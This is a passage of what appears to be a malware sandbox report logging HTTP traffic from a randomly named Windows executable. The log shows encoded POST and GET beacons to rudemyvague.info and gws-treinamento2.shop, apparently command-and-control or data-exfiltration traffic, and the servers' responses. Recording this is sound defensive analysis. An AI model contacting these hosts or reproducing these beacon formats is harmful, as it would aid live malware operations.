                                                                                        Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                        Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wSr(q. HU(5U_RJN@gsqJrC'}xI<U[koH"RqBurTBy[e~(hL/*J3.NX<SF0JB)OI.UkB(m7K.%^^G-<H5j^k}_|Wt'$[Xb}AAsXI\R^
                                                                                        Oct 9, 2024 12:51:38.205526114 CEST106INData Raw: e4 29 8d 61 25 53 06 6a e1 fe ac e2 5d d5 33 0a b0 a4 0a 90 d9 8c 5c 42 bc f0 59 c4 8b 18 ba 88 32 fe 1c e5 66 5f 82 57 c9 e3 2e 8b 26 65 97 54 6d ba 70 ab b7 e8 0e 78 b2 32 7e 84 5a 2e c9 9b 8f 91 cd ad da 92 5d fb 05 de be 0e 8d d9 c3 8e b6 7b
                                                                                        Data Ascii: )a%Sj]3\BY2f_W.&eTmpx2~Z.]{y.e0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.224916652.13.151.179801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:51:40.174690962 CEST751OUTPOST /t7t4/ HTTP/1.1
                                                                                        Host: www.rudemyvague.info
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.rudemyvague.info
                                                                                        Referer: http://www.rudemyvague.info/t7t4/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 56 6e 6f 42 37 71 2b 53 35 7a 5a 65 62 2f 30 50 68 4d 5a 61 38 4f 6a 57 76 43 65 74 76 46 49 62 66 74 4f 6d 4f 6d 72 37 51 51 2f 4f 70 66 56 39 4e 64 49 61 50 56 55 39 51 35 63 35 70 6e 53 6d 5a 4a 37 63 6f 2f 6d 58 4e 58 71 65 61 43 69 72 6a 54 32 67 64 2b 73 39 48 51 70 71 72 36 64 39 72 61 6e 2b 52 47 42 58 37 56 56 69 2f 75 75 64 62 33 42 37 6c 34 30 4c 30 51 52 51 30 2b 6f 48 77 50 59 6c 69 45 79 79 2b 34 41 59 38 4d 6d 4a 4c 46 41 53 63 55 54 7a 47 5a 32 33 52 4d 65 2b 63 45 51 70 55 63 49 4b 4d 45 67 32 32 36 46 67 4d 53 59 6c 4b 77 3d 3d
                                                                                        Data Ascii: jnQX=EOsfGuNEzgm/VnoB7q+S5zZeb/0PhMZa8OjWvCetvFIbftOmOmr7QQ/OpfV9NdIaPVU9Q5c5pnSmZJ7co/mXNXqeaCirjT2gd+s9HQpqr6d9ran+RGBX7VVi/uudb3B7l40L0QRQ0+oHwPYliEyy+4AY8MmJLFAScUTzGZ23RMe+cEQpUcIKMEg226FgMSYlKw==
                                                                                        Oct 9, 2024 12:51:40.764692068 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.10.3
                                                                                        Date: Wed, 09 Oct 2024 10:51:40 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        X-Powered-By: PHP/5.3.3
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                        Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                        Permissions-Policy: geolocation=(), microphone=()
                                                                                        Expires: 0
                                                                                        Content-Encoding: gzip
                                                                                        Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                        Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS%QV/s[]F\A8i"Q{kl7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_T{g8]~yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NP7>6YIpvYpmi?.4/X.
                                                                                        Oct 9, 2024 12:51:40.764708996 CEST106INData Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 da 74 e1 56 6f d1 1d f0 64 65 fc 08 b5 5c 92 37 1f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                        Data Ascii: SJYg`I x1te9]M.tVode\7#[%}mo\HSe0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.224916752.13.151.179801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:51:42.729895115 CEST2472OUTPOST /t7t4/ HTTP/1.1
                                                                                        Host: www.rudemyvague.info
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.rudemyvague.info
                                                                                        Referer: http://www.rudemyvague.info/t7t4/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 45 4f 73 66 47 75 4e 45 7a 67 6d 2f 57 48 59 42 39 35 57 53 79 7a 5a 5a 48 50 30 50 75 73 5a 57 38 4f 76 57 76 44 4b 39 76 32 34 62 61 71 43 6d 4f 41 58 37 41 67 2f 4f 34 2f 56 35 43 39 49 41 50 55 30 78 51 37 45 44 70 6a 32 6d 62 71 76 63 71 38 4f 51 5a 58 71 63 51 69 69 6f 6a 54 32 31 64 2b 64 30 48 51 73 4e 72 36 31 39 72 73 7a 2b 41 47 42 55 33 31 56 69 2f 75 75 72 62 33 42 44 6c 38 59 44 30 52 35 36 30 73 41 48 7a 75 34 6c 6c 69 36 78 38 34 42 77 31 73 6e 67 43 41 5a 6d 55 56 58 47 61 62 37 59 4f 76 57 6c 54 33 34 71 4d 50 4d 6b 4c 45 49 70 39 66 6c 33 47 6d 56 31 5a 6b 38 32 6f 46 39 30 62 4f 76 4f 63 6c 75 62 37 6a 32 34 75 70 6a 42 69 31 6f 41 6a 2b 59 62 59 75 54 4b 42 66 38 68 61 49 64 76 41 48 37 71 4d 53 57 6d 2b 51 6e 68 72 6d 67 2f 69 58 74 6b 51 46 61 6e 32 63 49 36 76 67 44 51 31 47 59 30 63 61 69 74 58 6d 46 34 6f 7a 6d 4f 46 7a 62 50 4a 5a 50 6b 34 6f 4c 47 6f 79 30 79 4e 46 62 2b 54 6c 72 57 4f 54 71 78 64 30 4b 37 69 43 2f 62 48 65 7a 42 50 63 39 4d 42 6a 79 41 49 [TRUNCATED]
                                                                                        Data Ascii: jnQX=EOsfGuNEzgm/WHYB95WSyzZZHP0PusZW8OvWvDK9v24baqCmOAX7Ag/O4/V5C9IAPU0xQ7EDpj2mbqvcq8OQZXqcQiiojT21d+d0HQsNr619rsz+AGBU31Vi/uurb3BDl8YD0R560sAHzu4lli6x84Bw1sngCAZmUVXGab7YOvWlT34qMPMkLEIp9fl3GmV1Zk82oF90bOvOclub7j24upjBi1oAj+YbYuTKBf8haIdvAH7qMSWm+Qnhrmg/iXtkQFan2cI6vgDQ1GY0caitXmF4ozmOFzbPJZPk4oLGoy0yNFb+TlrWOTqxd0K7iC/bHezBPc9MBjyAIIPSvV//yuzZjSOtyFWAw0pyVHSe89Q3gVx+c1s0cjuzNfLQ/PG9Psy4JcYuk6RrFSEGdQvfv0O/+kTltMQq/IZJwymHWJj7Zf6L9FpOxlCLEqI/Q9LYaUO3plKNUkPX1zz7o+oRqczNqacYZJOLfYeoHd9YsC1SwWSOn/ALun13h6afYh/Tl0Z9tyicOWMKOLy4lW9QFhzXB6OMIu6W6wTD+aJk34K5fObhJg2Y4qDz3qa8KDn6ndASnu4yLvOjTfRK8bE/dLrY2m2ZEmR08J0YY4WEZz1k5+wW2IU782A11YeapqMbcCmj1mTbX2VH2loozKj/4s0UpSR9s2UORO7OXe7okijVYZzOF4uIHcDhlROLS8hvhC3+KAMGpSz57FOX5nM94GjJtMq/AwSkmzVNX/ajS9NDJ0NFc1KszEBJBywdRAV1evMugK32BhLS8YsNLaUQbz00v9eCEvhLvPZ+ev+pBXegUU8EhRCtRz3LOO398lUOJjuVa3sEhv78lP1nY6MmtBEQx/RY8IHsJGJl9x2AwURXn8HCKKzDDYyhAeQV1yorTNeJyTLtaTdQOM3BvvRlv8sCDEzkFXTJ3Q0fgHORx5LZ1p8vu4i2SPE8XYMK6K/ongDaQNZicrlV7J1g1GCa+gRqpzP06K9Yzlqyi2iTVt1ABbL [TRUNCATED]
                                                                                        Oct 9, 2024 12:51:42.735042095 CEST1704OUTData Raw: 46 51 30 72 58 6e 79 67 4e 50 6b 2f 68 7a 53 43 66 66 59 66 69 32 4c 55 64 4f 53 4c 75 54 69 52 57 4f 47 4b 6f 59 55 76 79 51 72 65 33 56 37 79 54 68 57 50 50 52 73 57 67 68 36 73 73 4d 74 2b 54 76 53 5a 58 37 37 47 38 58 69 75 47 76 4a 48 4e 2b
                                                                                        Data Ascii: FQ0rXnygNPk/hzSCffYfi2LUdOSLuTiRWOGKoYUvyQre3V7yThWPPRsWgh6ssMt+TvSZX77G8XiuGvJHN+qez+2ru9WQ0lkzQvOWEKdCdUhqWuc8yhP4wVA+nOXIbm8iWDhBDXJN8316gq9SM1yv2Z6cF0aSIhw31yCmJdVEO2m7LdlWM77DxXTyJZqIWAVwcawnH5BKZzRnRCxtCV7PSa1AEIPJY9LTHl6jwTuvVRWWsuz4Z1m
                                                                                        Oct 9, 2024 12:51:43.335017920 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.10.3
                                                                                        Date: Wed, 09 Oct 2024 10:51:43 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        X-Powered-By: PHP/5.3.3
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                        Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                        Permissions-Policy: geolocation=(), microphone=()
                                                                                        Expires: 0
                                                                                        Content-Encoding: gzip
                                                                                        Data Raw: 32 66 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 95 df 6f 9b 30 10 c7 9f cb 5f 61 31 4d 6d a5 26 e4 47 93 34 94 20 4d 5b 3b 4d da c3 b4 4e 7b 37 f8 42 bc 81 4d 6d 43 9b 56 fb 5f f6 d8 fc 1d f9 c7 76 86 90 a6 95 3a 78 c2 9c 7d 9f fb de f9 6c 07 2b 93 a5 a1 e3 04 2b a0 2c 74 02 c3 4d 0a e1 4d 91 e7 0a b4 e6 52 10 06 9a 30 29 c4 76 03 3a f0 ea 79 07 1d b4 59 57 a3 48 b2 f5 a3 73 b4 94 c2 f4 96 34 e3 e9 da ff a0 38 4d 2f 77 36 cd 1f c0 1f 4e f3 fb 4b e7 8f e3 ac 86 8f 87 f6 d1 c0 da 8f 0c dc 9b 9e 51 54 e8 a5 54 99 8f d1 41 c5 54 43 e5 d2 8f 12 eb 14 d1 f8 77 a2 64 21 98 5f a8 f4 e4 d8 d3 dc 80 c7 b3 c4 43 1c 1b f6 ef 20 ca 8f 4f 49 0c c2 80 22 46 e6 44 c8 9e 82 1c a8 69 30 a3 56 cc a8 0b 66 dc 8a 19 77 c1 9c b7 62 ce bb 60 26 ad 98 49 17 cc b4 15 33 ed 82 99 b5 62 66 5d 30 17 ad 98 8b 2e 98 79 2b 66 de 05 33 1c b4 f7 df a0 0b e8 05 a6 3e 01 24 96 25 a8 7a c1 83 14 f0 03 8f 02 2e 73 8e 32 aa 12 2e 7a c8 c1 53 52 1f 93 03 df 58 a6 52 f9 ef 46 a3 11 da 65 4e 63 6e d6 fe a0 3f 9f e0 ef 1d 67 66 e5 cf 06 ef [TRUNCATED]
                                                                                        Data Ascii: 2fdo0_a1Mm&G4 M[;MN{7BMmCV_v:x}l++,tMMR0)v:yYWHs48M/w6NKQTTATCwd!_C OI"FDi0Vfwb`&I3bf]0.y+f3>$%z.s2.zSRXRFeNcn?gf/N%q4Gouz]<ZDuU\8/'wS'QV/s[]F\A8i"Q{kl7 $$|)e\Ra4O$/yLb0Dn^A*'s~"#Pf.a_T{g8]~yXx%B1a\m#-2S\3Q!n\pK"(|ZJyjfA*NP7>6YIpvYpmi?.4/X.
                                                                                        Oct 9, 2024 12:51:43.335053921 CEST106INData Raw: c9 53 1a c3 4a a6 0c d4 c2 fd 59 c5 bb aa 67 14 60 49 15 20 b3 19 b9 84 78 e1 b3 88 17 31 74 11 65 fc 39 ca cd be 04 af 92 c7 5d 16 4d ca 2e a9 da 74 e1 56 6f d1 1d f0 64 65 fc 08 b5 5c 92 37 1f 23 9b 5b b5 25 bb f6 0b bc 7d 1d 1a b3 87 1d 6d f7
                                                                                        Data Ascii: SJYg`I x1te9]M.tVode\7#[%}moe0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.224916852.13.151.179801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:51:45.272986889 CEST478OUTGET /t7t4/?jnQX=JME/FbwkkQiTLR8Hpq6D7hdkRf4IpbxJ+vLJvTOCgHppMKWbYWfaTBHe/9olNtMnBFYydrc5qS+BY9eInbnUEE+fai2nxgmrSKR1Lz1Vur11jq7KYWpx7HNZ/+DB&op9=BLtTm0V HTTP/1.1
                                                                                        Host: www.rudemyvague.info
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:51:45.868669033 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.10.3
                                                                                        Date: Wed, 09 Oct 2024 10:51:45 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        X-Powered-By: PHP/5.3.3
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                        Content-Security-Policy: default-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                        Permissions-Policy: geolocation=(), microphone=()
                                                                                        Expires: 0
                                                                                        Data Raw: 37 36 35 0d 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 70 70 72 65 73 73 69 6f 6e 20 64 65 73 20 64 6f 6e 6e c3 a9 65 73 3c 2f 74 69 74 6c 65 3e 0a 0a 0a 3c 73 74 79 6c 65 3e 0a 0a 62 6f 64 79 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 0a 7d 0a 0a 68 31 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 0a 09 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 3b 0a 7d 0a 0a 2e 62 67 31 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 31 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 32 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 32 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 33 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 [TRUNCATED]
                                                                                        Data Ascii: 765<html><head><title>Suppression des donnes</title><style>body{font-family:Arial;font-size:16px;}h1{font-size:20px;text-transform:uppercase;}.bg1{background:url('/site/img/fond1.webp') center top no-repeat;}.bg2{background:url('/site/img/fond2.webp') center top no-repeat;}.bg3{background:url('/site/img/fond3.webp') center top no-repeat;}.bg4{background:url('/site/img/fond4.webp') center top no-repeat;}.bg5{background:url('/site/img/fond5.webp') center top no-repeat;}.bg6{background:url('/site/img/fond6.webp') center top no-repeat;}.bg7{background:url('/site/img/fond7.webp') center top no-repeat;}.bg8{background:url('/site/i
                                                                                        Oct 9, 2024 12:51:45.868725061 CEST1210INData Raw: 6d 67 2f 66 6f 6e 64 38 2e 77 65 62 70 27 29 20 63 65 6e 74 65 72 20 74 6f 70 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 7d 0a 0a 2e 62 67 39 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 27 2f 73 69 74 65 2f 69 6d 67 2f 66 6f 6e 64 39 2e 77 65
                                                                                        Data Ascii: mg/fond8.webp') center top no-repeat;}.bg9{background:url('/site/img/fond9.webp') center top no-repeat;}.bg10{background:url('/site/img/fond10.webp') center top no-repeat;}.bg{background-size: cover;}.zoneText{margin-top:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.224916984.32.84.32801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:51:50.935633898 CEST2472OUTPOST /9vaq/ HTTP/1.1
                                                                                        Host: www.gws-treinamento2.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.gws-treinamento2.shop
                                                                                        Referer: http://www.gws-treinamento2.shop/9vaq/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 76 55 31 4b 6a 4a 77 4c 6f 69 56 31 65 72 68 45 2f 39 63 4c 73 77 78 78 52 46 76 44 78 43 2f 42 32 76 61 35 46 6f 64 71 79 42 6f 65 53 56 2b 57 4a 49 52 56 72 41 2b 70 6b 6d 77 2b 35 4d 79 39 77 6e 38 78 79 77 64 74 6b 48 6a 63 64 51 67 74 69 37 68 68 6d 43 6d 61 4c 65 44 2b 58 58 32 50 58 4f 6c 79 36 4c 38 68 77 51 54 70 47 6e 47 76 67 76 32 53 46 35 71 6e 70 58 38 6d 6d 4d 71 30 51 53 44 63 38 6c 75 65 30 4a 57 6c 43 66 69 6f 71 4a 4a 64 55 62 63 50 54 52 36 67 74 6f 41 59 59 7a 41 79 61 45 49 51 49 35 49 76 50 33 4f 4a 6f 4c 58 44 6e 5a 44 6f 43 55 70 2f 37 43 72 64 50 76 66 6e 59 30 34 58 51 38 78 50 41 6d 4c 76 2b 63 67 45 4f 35 49 39 71 4d 35 4e 6c 55 32 48 78 6d 31 30 69 44 64 32 63 4c 43 5a 61 6b 4b 64 6f 4a 69 45 51 6e 70 67 76 52 65 6c 33 37 4c 2f 6b 66 37 4c 6f 45 72 4b 36 4a 4a 57 71 49 31 65 6f 6e 79 54 5a 66 32 7a 79 43 7a 6f 6e 44 45 37 79 34 34 6c 4d 42 46 49 35 7a 5a 55 42 4a 75 56 7a 6f 5a 47 33 72 44 4b 63 72 55 52 47 6a 41 61 41 69 63 75 6c 37 34 67 79 68 54 69 49 [TRUNCATED]
                                                                                        Data Ascii: jnQX=vU1KjJwLoiV1erhE/9cLswxxRFvDxC/B2va5FodqyBoeSV+WJIRVrA+pkmw+5My9wn8xywdtkHjcdQgti7hhmCmaLeD+XX2PXOly6L8hwQTpGnGvgv2SF5qnpX8mmMq0QSDc8lue0JWlCfioqJJdUbcPTR6gtoAYYzAyaEIQI5IvP3OJoLXDnZDoCUp/7CrdPvfnY04XQ8xPAmLv+cgEO5I9qM5NlU2Hxm10iDd2cLCZakKdoJiEQnpgvRel37L/kf7LoErK6JJWqI1eonyTZf2zyCzonDE7y44lMBFI5zZUBJuVzoZG3rDKcrURGjAaAicul74gyhTiI0zPDWkJD2zj45UYVUcak5YRmwpCZZL9TWrTq2SNIAaCcR5tVAXpuzRreDaveI7csXRb+Jugb5ZHG2VzD0XaqCgufvzrUS/vKy7l0qj3XREPKjZLUEQuw2UKRvMN/lwEGPt52sRrru4EcGfOX3w9yi0MN4SutUv5jYLGCX+W5Yu4G8n7kDWbJNnC7bgyL5KTdkX+xAYz62VjNFysdFmSyzKzX1S2dvTVTfCvgzUnwfXccSZJvncBo0cHPhLfsh6NTvSz1RBSsPOXpQVx55N/XqfYS1LZ4P5DpMLgFYP1dl4gohGoTD5e0ApAMcVkKlcVIhAgry0WsH97kEOCM4KAOGgMWkBIb8yVLLXTJHgBVbPYFF+/aOOrpOD7bvhF9E2IzzEsJH5hH2r++YBdboFOLNYfvXwuqFqEmqPoB+24/B5PjWLEPQq1QV8hdFpI4o1I9WNA36uap9hXK/ijJMwzH2P6FaYAA0OjnXM4yS73jJILuQgyDApc6C0+o+B23iHRKKSkOeiyXJ1nCom/x+/NQ+V4ptfUSowhtZU67iJqj3KOg1MPhSgCgZMZcQEZ7blFZTP1Fozim5GJ15/VtBHgbb/OUytq1nx65z4BwZN+IfVvT+l1bFL9x31/El1fjNicsydEXLkxISHLw2XeLvziXTXUJxLTAABCzP3 [TRUNCATED]
                                                                                        Oct 9, 2024 12:51:50.940531969 CEST255OUTData Raw: 30 52 75 6b 75 5a 4e 75 59 6a 38 54 2f 43 59 75 2b 4f 71 44 34 2f 67 56 42 6a 6d 64 30 35 7a 5a 6f 75 73 59 43 4e 62 72 6d 53 6c 6f 33 66 42 6f 33 50 46 64 6f 4e 67 7a 59 63 71 41 4c 47 62 49 37 42 62 4c 2f 58 61 31 43 36 67 6d 33 51 61 58 79 53
                                                                                        Data Ascii: 0RukuZNuYj8T/CYu+OqD4/gVBjmd05zZousYCNbrmSlo3fBo3PFdoNgzYcqALGbI7BbL/Xa1C6gm3QaXySQbTbXdpTPtnOoK/fM94bGwFqFQm33BrDBxiGjE3UsMIcQL4/n0f3k+Ut041AXSSG4FnmtdjPxdY1zNcLCNc0gZP1kRo6L2hQD+C+q5GyRwUKu82mTTzx21Ir/ZD1tJlJFKzh1IUlNn7gQ3Li71I6QlCEexHeplypB


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.224917084.32.84.32801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:51:53.497941017 CEST766OUTPOST /9vaq/ HTTP/1.1
                                                                                        Host: www.gws-treinamento2.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.gws-treinamento2.shop
                                                                                        Referer: http://www.gws-treinamento2.shop/9vaq/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
